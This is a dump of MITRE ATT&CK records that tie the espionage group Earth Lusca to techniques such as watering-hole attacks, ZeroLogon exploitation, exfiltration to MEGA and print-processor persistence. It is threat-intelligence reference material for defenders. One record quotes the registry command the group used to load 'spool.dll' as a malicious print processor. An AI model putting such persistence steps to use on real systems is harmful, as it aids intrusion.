description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--d742a578-d70e-4d0e-96a6-02a9c30204e6
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has performed watering hole attacks.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--29a1fc8a-58c3-4465-b170-d9ec7c2d4d22
revoked : False
technique : Drive-by Compromise
technique_description : Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring [Application Access Token](https://attack.mitre.org/techniques/T1550/001).

Multiple ways of delivering exploit code to a browser exist (i.e., [Drive-by Target](https://attack.mitre.org/techniques/T1608/004)), including:

* A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, and cross-site scripting
* Script files served to a legitimate website from a publicly writeable cloud storage bucket are modified by an adversary
* Malicious ads are paid for and served through legitimate ad providers (i.e., [Malvertising](https://attack.mitre.org/techniques/T1583/008))
* Built-in web application interfaces are leveraged for the insertion of any other kind of object that can be used to display web content or contain a script that executes on the visiting client (e.g. forum posts, comments, and other user controllable web content).

Often the website used by an adversary is one visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted campaign is often referred to a strategic web compromise or watering hole attack. There are several known examples of this occurring.(Citation: Shadowserver Strategic Web Compromise)

Typical drive-by compromise process:

1. A user visits a website that is used to host the adversary controlled content.
2. Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version. 
    * The user may be required to assist in this process by enabling scripting or active website components and ignoring warning dialog boxes.
3. Upon finding a vulnerable version, exploit code is delivered to the browser.
4. If exploitation is successful, then it will give the adversary code execution on the user's system unless other protections are in place.
    * In some cases a second visit to the website after the initial scan is required before exploit code is delivered.

Unlike [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), the focus of this technique is to exploit software on a client endpoint upon visiting a website. This will commonly give an adversary access to systems on the internal network instead of external systems that may be in a DMZ.

Adversaries may also use compromised websites to deliver a user to a malicious application designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, to gain access to protected applications and information. These malicious applications have been delivered through popups on legitimate websites.(Citation: Volexity OceanLotus Nov 2017)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='initial-access')]
technique_id : T1189
matrix : mitre-attack
platform : ['Windows', 'Linux', 'macOS', 'SaaS']
data_sources : ['Application Log: Application Log Content', 'Network Traffic: Network Traffic Content', 'Process: Process Creation', 'File: File Creation', 'Network Traffic: Network Connection Creation']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) adopted Cloudflare as a proxy for compromised servers.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--bee75401-9e24-4c5d-9203-0b3cdca01cbf
revoked : False
technique : Proxy
technique_description : Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.

Adversaries can also take advantage of routing schemes in Content Delivery Networks (CDNs) to proxy command and control traffic.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='command-and-control')]
technique_id : T1090
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows', 'Network']
data_sources : ['Network Traffic: Network Traffic Flow', 'Network Traffic: Network Traffic Content', 'Network Traffic: Network Connection Creation']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) used VBA scripts.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--245ced0a-5a53-44bd-a4db-07451f752b14
revoked : False
technique : Visual Basic
technique_description : Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft)

Derivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Microsoft Office, as well as several third-party applications.(Citation: Microsoft VBA)(Citation: Wikipedia VBA) VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of [JavaScript](https://attack.mitre.org/techniques/T1059/007) on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).(Citation: Microsoft VBScript)

Adversaries may use VB payloads to execute malicious commands. Common malicious usage includes automating execution of behaviors with VBScript or embedding VBA content into [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) payloads (which may also involve [Mark-of-the-Web Bypass](https://attack.mitre.org/techniques/T1553/005) to enable execution).(Citation: Default VBS macros Blocking )
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='execution')]
technique_id : T1059.005
matrix : mitre-attack
platform : ['Windows', 'macOS', 'Linux']
data_sources : ['Module: Module Load', 'Command: Command Execution', 'Process: Process Creation', 'Script: Script Execution']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) required users to click on a malicious file for the loader to activate.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--b71bc667-b3e8-4482-ba74-118049872be4
revoked : False
technique : Malicious File
technique_description : An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001). Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl.

Adversaries may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036) and [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to increase the likelihood that a user will open and successfully execute a malicious file. These methods may include using a familiar naming convention and/or password protecting the file and supplying instructions to a user on how to open it.(Citation: Password Protected Word Docs) 

While [Malicious File](https://attack.mitre.org/techniques/T1204/002) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='execution')]
technique_id : T1204.002
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows']
data_sources : ['Process: Process Creation', 'File: File Creation']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--bf1b6176-597c-4600-bfcd-ac989670f96b
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has used the megacmd tool to upload stolen files from a victim network to MEGA.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--a44ba3c3-406a-49cf-9d7b-9ee7f09f9ae4
revoked : False
technique : Exfiltration to Cloud Storage
technique_description : Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and control channel. Cloud storage services allow for the storage, edit, and retrieval of data from a remote cloud storage server over the Internet.

Examples of cloud storage services include Dropbox and Google Docs. Exfiltration to these cloud storage services can provide a significant amount of cover to the adversary if hosts within the network are already communicating with the service. 
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='exfiltration')]
technique_id : T1567.002
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows']
data_sources : ['Network Traffic: Network Traffic Content', 'Network Traffic: Network Connection Creation', 'Network Traffic: Network Traffic Flow', 'File: File Access', 'Command: Command Execution']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--9db0cf3a-a3c9-4012-8268-123b9db6fd82
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has used [Mimikatz](https://attack.mitre.org/software/S0002) to exploit a domain controller via the ZeroLogon exploit (CVE-2020-1472).(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--495db551-b69c-482e-b242-831011c054f7
revoked : False
technique : Exploitation of Remote Services
technique_description : Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.

An adversary may need to determine if the remote system is in a vulnerable state, which may be done through [Network Service Discovery](https://attack.mitre.org/techniques/T1046) or other Discovery methods looking for common, vulnerable software that may be deployed in the network, the lack of certain patches that may indicate vulnerabilities,  or security software that may be used to detect or contain remote exploitation. Servers are likely a high value target for lateral movement exploitation, but endpoint systems may also be at risk if they provide an advantage or access to additional resources.

There are several well-known vulnerabilities that exist in common services such as SMB (Citation: CIS Multiple SMB Vulnerabilities) and RDP (Citation: NVD CVE-2017-0176) as well as applications that may be used within internal networks such as MySQL (Citation: NVD CVE-2016-6662) and web server services.(Citation: NVD CVE-2014-7169)

Depending on the permissions level of the vulnerable remote service an adversary may achieve [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) as a result of lateral movement exploitation as well.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='lateral-movement')]
technique_id : T1210
matrix : mitre-attack
platform : ['Linux', 'Windows', 'macOS']
data_sources : ['Network Traffic: Network Traffic Content', 'Application Log: Application Log Content']
permissions_required : ['User']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--2de47683-f398-448f-b947-9abcc3e32fad
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has added the Registry key `HKLM\SYSTEM\ControlSet001\Control\Print\Environments\Windows x64\Print Processors\UDPrint” /v Driver /d “spool.dll /f` to load malware as a Print Processor.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--6a779cbf-ef5c-4018-a91f-10889b2068b0
revoked : False
technique : Print Processors
technique_description : Adversaries may abuse print processors to run malicious DLLs during system boot for persistence and/or privilege escalation. Print processors are DLLs that are loaded by the print spooler service, `spoolsv.exe`, during boot.(Citation: Microsoft Intro Print Processors)

Adversaries may abuse the print spooler service by adding print processors that load malicious DLLs at startup. A print processor can be installed through the <code>AddPrintProcessor</code> API call with an account that has <code>SeLoadDriverPrivilege</code> enabled. Alternatively, a print processor can be registered to the print spooler service by adding the <code>HKLM\SYSTEM\\[CurrentControlSet or ControlSet001]\Control\Print\Environments\\[Windows architecture: e.g., Windows x64]\Print Processors\\[user defined]\Driver</code> Registry key that points to the DLL.

For the malicious print processor to be correctly installed, the payload must be located in the dedicated system print-processor directory, that can be found with the <code>GetPrintProcessorDirectory</code> API call, or referenced via a relative path from this directory.(Citation: Microsoft AddPrintProcessor May 2018) After the print processors are installed, the print spooler service, which starts during boot, must be restarted in order for them to run.(Citation: ESET PipeMon May 2020)

The print spooler service runs under SYSTEM level permissions, therefore print processors installed by an adversary may run under elevated privileges.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='persistence'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='privilege-escalation')]
technique_id : T1547.012
matrix : mitre-attack
platform : ['Windows']
data_sources : ['Windows Registry: Windows Registry Key Modification', 'File: File Creation', 'Driver: Driver Load', 'Module: Module Load', 'Process: OS API Execution']
permissions_required : ['Administrator', 'SYSTEM']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
